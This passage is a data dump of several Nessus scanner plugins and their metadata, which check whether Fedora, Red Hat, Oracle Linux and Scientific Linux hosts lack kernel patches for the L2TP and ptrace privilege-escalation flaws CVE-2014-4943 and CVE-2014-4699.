https://lists.fedoraproject.org/pipermail/package-announce/2014-July/135630.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b909c4ca\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"kernel-3.15.6-200.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-29T13:36:29", "references": ["https://www.redhat.com/security/data/cve/CVE-2014-4943.html", "http://rhn.redhat.com/errata/RHSA-2014-1025.html"], "pluginID": "79113", "description": "Updated kernel packages that fix one security issue and one bug are now available for Red Hat Enterprise Linux 6.2 Advanced Update Support.\n\nThe Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\n* A flaw was found in the way the pppol2tp_setsockopt() and pppol2tp_getsockopt() functions in the Linux kernel's PPP over L2TP implementation handled requests with a non-SOL_PPPOL2TP socket option level. A local, unprivileged user could use this flaw to escalate their privileges on the system. (CVE-2014-4943, Important)\n\nRed Hat would like to thank Sasha Levin for reporting this issue.\n\nThis update also fixes the following bug :\n\n* When a device was registered to a bus, a race condition could occur between the device being added to the list of devices of the bus and binding the device to a driver. As a result, the device could already be bound to a driver which led to a warning and incorrect reference counting, and consequently to a kernel panic on device removal. To avoid the race condition, this update adds a check to identify an already bound device. (BZ#1114409)\n\nAll kernel users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. The system must be rebooted for this update to take effect.", "edition": 3, "reporter": "Tenable", "published": "2014-11-11T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "nessus", "title": "RHEL 6 : kernel (RHSA-2014:1025)", "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4943"], "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-firmware", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel", "cpe:/o:redhat:enterprise_linux:6.2", "p-cpe:/a:redhat:enterprise_linux:python-perf", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "modified": "2017-01-06T00:00:00", "id": "REDHAT-RHSA-2014-1025.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=79113", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1025. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79113);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2017/01/06 15:40:58 $\");\n\n script_cve_id(\"CVE-2014-4943\");\n script_xref(name:\"RHSA\", value:\"2014:1025\");\n\n script_name(english:\"RHEL 6 : kernel (RHSA-2014:1025)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix one security issue and one bug are\nnow available for Red Hat Enterprise Linux 6.2 Advanced Update\nSupport.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A flaw was found in the way the pppol2tp_setsockopt() and\npppol2tp_getsockopt() functions in the Linux kernel's PPP over L2TP\nimplementation handled requests with a non-SOL_PPPOL2TP socket option\nlevel. A local, unprivileged user could use this flaw to escalate\ntheir privileges on the system. (CVE-2014-4943, Important)\n\nRed Hat would like to thank Sasha Levin for reporting this issue.\n\nThis update also fixes the following bug :\n\n* When a device was registered to a bus, a race condition could occur\nbetween the device being added to the list of devices of the bus and\nbinding the device to a driver. As a result, the device could already\nbe bound to a driver which led to a warning and incorrect reference\ncounting, and consequently to a kernel panic on device removal. To\navoid the race condition, this update adds a check to identify an\nalready bound device. (BZ#1114409)\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2014-4943.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2014-1025.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2017 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6\\.2([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.2\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1025\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-2.6.32-220.54.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.32-220.54.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-2.6.32-220.54.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.32-220.54.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debuginfo-2.6.32-220.54.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-220.54.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.32-220.54.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", reference:\"kernel-doc-2.6.32-220.54.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", reference:\"kernel-firmware-2.6.32-220.54.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.32-220.54.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"perf-2.6.32-220.54.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"perf-debuginfo-2.6.32-220.54.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"python-perf-2.6.32-220.54.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-2.6.32-220.54.1.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debug / kernel-debug-debuginfo / kernel-debug-devel / etc\");\n }\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-29T13:40:14", "references": ["https://oss.oracle.com/pipermail/el-errata/2014-July/004234.html", "https://oss.oracle.com/pipermail/el-errata/2014-July/004235.html"], "pluginID": "76603", "description": "Description of changes:\n\nkernel-uek [2.6.32-400.36.4.el6uek]\n- l2tp: fix an unprivileged user to kernel privilege escalation (Sasha Levin) [Orabug: 19229529] {CVE-2014-4943} {CVE-2014-4943}\n- ptrace,x86: force IRET path after a ptrace_stop() (Tejun Heo) [Orabug: 19230692] {CVE-2014-4699}", "edition": 2, "reporter": "Tenable", "published": "2014-07-20T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "nessus", "title": "Oracle Linux 5 / 6 : Unbreakable Enterprise kernel (ELSA-2014-3048)", "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4699", "CVE-2014-4943"], "cpe": ["p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.4.el5uekdebug", "cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.4.el6uek", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.4.el5uek", "p-cpe:/a:oracle:linux:kernel-uek", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.4.el6uekdebug", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.4.el6uekdebug", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.4.el6uek", "p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.4.el5uekdebug", "p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.4.el5uek", "p-cpe:/a:oracle:linux:kernel-uek-headers", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "modified": "2015-12-01T00:00:00", "id": "ORACLELINUX_ELSA-2014-3048.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=76603", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3048.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76603);\n script_version(\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2015/12/01 17:35:11 $\");\n\n script_cve_id(\"CVE-2014-4699\", \"CVE-2014-4943\");\n script_bugtraq_id(63536, 68411, 68768);\n\n script_name(english:\"Oracle Linux 5 / 6 : Unbreakable Enterprise kernel (ELSA-2014-3048)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\nkernel-uek\n[2.6.32-400.36.4.el6uek]\n- l2tp: fix an unprivileged user to kernel privilege escalation (Sasha \nLevin) [Orabug: 19229529] {CVE-2014-4943} {CVE-2014-4943}\n- ptrace,x86: force IRET path after a ptrace_stop() (Tejun Heo) \n[Orabug: 19230692] {CVE-2014-4699}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-July/004234.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-July/004235.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.4.el5uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.4.el5uekdebug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.4.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.4.el6uekdebug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.4.el5uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.4.el5uekdebug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.4.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.4.el6uekdebug\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-2.6.32-400.36.4.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-debug-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-debug-2.6.32-400.36.4.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-debug-devel-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-debug-devel-2.6.32-400.36.4.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-devel-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-devel-2.6.32-400.36.4.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-doc-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-doc-2.6.32-400.36.4.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-firmware-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-firmware-2.6.32-400.36.4.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-headers-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-headers-2.6.32-400.36.4.el5uek\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mlnx_en-2.6.32-400.36.4.el5uek-1.5.7-2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mlnx_en-2.6.32-400.36.4.el5uekdebug-1.5.7-2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ofa-2.6.32-400.36.4.el5uek-1.5.1-4.0.58\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ofa-2.6.32-400.36.4.el5uekdebug-1.5.1-4.0.58\")) flag++;\n\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-2.6.32-400.36.4.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-2.6.32-400.36.4.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-devel-2.6.32-400.36.4.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-devel-2.6.32-400.36.4.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-doc-2.6.32-400.36.4.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-firmware-2.6.32-400.36.4.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-headers-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-headers-2.6.32-400.36.4.el6uek\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mlnx_en-2.6.32-400.36.4.el6uek-1.5.7-0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mlnx_en-2.6.32-400.36.4.el6uekdebug-1.5.7-0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ofa-2.6.32-400.36.4.el6uek-1.5.1-4.0.58\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ofa-2.6.32-400.36.4.el6uekdebug-1.5.1-4.0.58\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-29T13:45:47", "references": ["http://www.nessus.org/u?b6c39e8e"], "pluginID": "76783", "edition": 2, "description": "* It was found that the Linux kernel's ptrace subsystem allowed a traced process' instruction pointer to be set to a non-canonical memory address without forcing the non-sysret code path when returning to user space. A local, unprivileged user could use this flaw to crash the system or, potentially, escalate their privileges on the system.\n(CVE-2014-4699, Important)\n\nNote: The CVE-2014-4699 issue only affected systems using an Intel CPU.\n\n* A flaw was found in the way the pppol2tp_setsockopt() and pppol2tp_getsockopt() functions in the Linux kernel's PPP over L2TP implementation handled requests with a non-SOL_PPPOL2TP socket option level. A local, unprivileged user could use this flaw to escalate their privileges on the system. (CVE-2014-4943, Important)\n\nThe system must be rebooted for this update to take effect.", "reporter": "Tenable", "published": "2014-07-25T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "nessus", "title": "Scientific Linux Security Update : kernel on SL6.x i386/x86_64", "naslFamily": "Scientific Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4699", "CVE-2014-4943"], "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "modified": "2015-11-16T00:00:00", "id": "SL_20140723_KERNEL_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=76783", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76783);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/11/16 15:47:34 $\");\n\n script_cve_id(\"CVE-2014-4699\", \"CVE-2014-4943\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"* It was found that the Linux kernel's ptrace subsystem allowed a\ntraced process' instruction pointer to be set to a non-canonical\nmemory address without forcing the non-sysret code path when returning\nto user space. A local, unprivileged user could use this flaw to crash\nthe system or, potentially, escalate their privileges on the system.\n(CVE-2014-4699, Important)\n\nNote: The CVE-2014-4699 issue only affected systems using an Intel\nCPU.\n\n* A flaw was found in the way the pppol2tp_setsockopt() 